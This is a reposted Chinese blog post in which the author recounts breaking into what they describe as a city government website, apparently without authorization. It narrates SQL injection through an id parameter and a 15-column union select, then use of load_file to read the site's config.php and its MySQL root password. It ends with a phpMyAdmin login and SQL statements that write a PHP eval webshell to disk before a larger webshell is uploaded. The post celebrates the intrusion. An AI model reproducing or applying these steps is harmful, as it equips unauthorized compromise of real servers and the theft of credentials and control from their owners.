转自：http://jxsaqjh.cn/article.asp?id=37

   这是第一次接触PHP注入，所有的东西都是在入侵中自己找到的。
    是一个政府的网站，这个城市和我还有些渊源，在这里就不多说了！在主页找了一个PHP？ID=的连接，加个'返回出错了，继续and 1=1 正常 and 1=2 出错，运气不错，下面查表段数量，用 order by ,可是后面的数字换成任何都出错，遂手动递加，id=-1 union select  1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 到了15暴出数字了，第一次有这样的收获，高兴不言而喻！
    随即database()替换数字5，返回没有显示，再试user(),version()同样没有内容，暂停！
    休息下拿出IISSCANER扫目标IP，显示呵帕奇2而且是UNIX系统，带着试试的心情去load_file('/'),返回出错，替换‘/’为char(47)成功暴出目录，艰难寻找目标站的目录在这里不表，找到目录后在目录的上一级发现一个PHPADM目录，随即便是一阵头脑风暴，莫非是PHPMYADMIN的目录？试下！
    调出CMD,ping 目标玉米，得到目标IP，IE中提交202.*.*9/phpadm出现如图界面，证实猜想！
    
        只是需要密码的，要不然PHPMYADMIN的那个@的古老漏洞也许会有至关重要的作用，在这里继续利用注入点，浏览寻找网站配置文件，最终找到/include/config.php.还犹豫什么？编码目标站路径，在URL中load_file(config路径),返回空白，不要急，因为PHP代码中有<?和?>所以浏览器不显示了，我们只要查看源文件就能达到目的，当然也可以用REPLACE函数，看大家心情了！查看源文件如图找到MYSQL帐号和密码！

       似乎我们一切都进展的很顺利，下面用牛族的MYSQL连接器连接，过了良久返回不能连接，不甘心再传到我的空间一个PHP马（我的空间支持PHP），然后访问马儿，用马自带的MYSQL连接，结果还是失败，回显是对方不允许外部连接，UNIX就是这样，太安全！转换思路，我们不是知道PHPMYADMIN的后台了吗？对啊！
    用暴出的ROOT帐号登陆PHPMYADMIN，老天真是对我太好了！如图

成功进入，而且还是ROOT权限哦！还犹豫什么，导出SHELL啊！
依次执行如下语句（要先随便找个数据库）：
==================================
Create TABLE jxsaqjh (cmd text NOT NULL);
Insert INTO jxsaqjh (cmd) VALUES('<?php eval($_POST[jj]);?>');
select cmd from jxsaqjh into outfile '马儿路径';
Drop TABLE IF EXISTS jxsaqjh;
===================================
         很遗憾，第一次把马儿路径写在了站点跟目录下，返回CAN'T  WRITE........还是UNIX的权限战略在作怪，没办法换目录吧！第二次找到了UPLOAD这个目录，呵呵，这回应该不会有问题了吧？要是这个目录也不让写，那用户怎么上传文件啊？可是事实让我太失望了，还是不能写，遂浏览UPLOAD目录，发现里面只有3个SWF文件，应该是不常用的，而且在主站也没有发现任何下载的连接，还得换，FUCK UNIX！
    休息下，发现了IMG这个目录，再看看整站最多的就是图片，随便找个图片属性，发现目录就是IMG，老天保佑我吧！语句少做修改，回到PHPMYADMIN执行，返回如图

       看来我人品还是不错的，直接传大马，结束战斗！如图

      对与UNIX我还是刚刚接触，或许在早就接触它的人来看这次入侵并不能说明什么，但是我确实学到了很多以前所不知道的，所以入侵的精髓在于过程。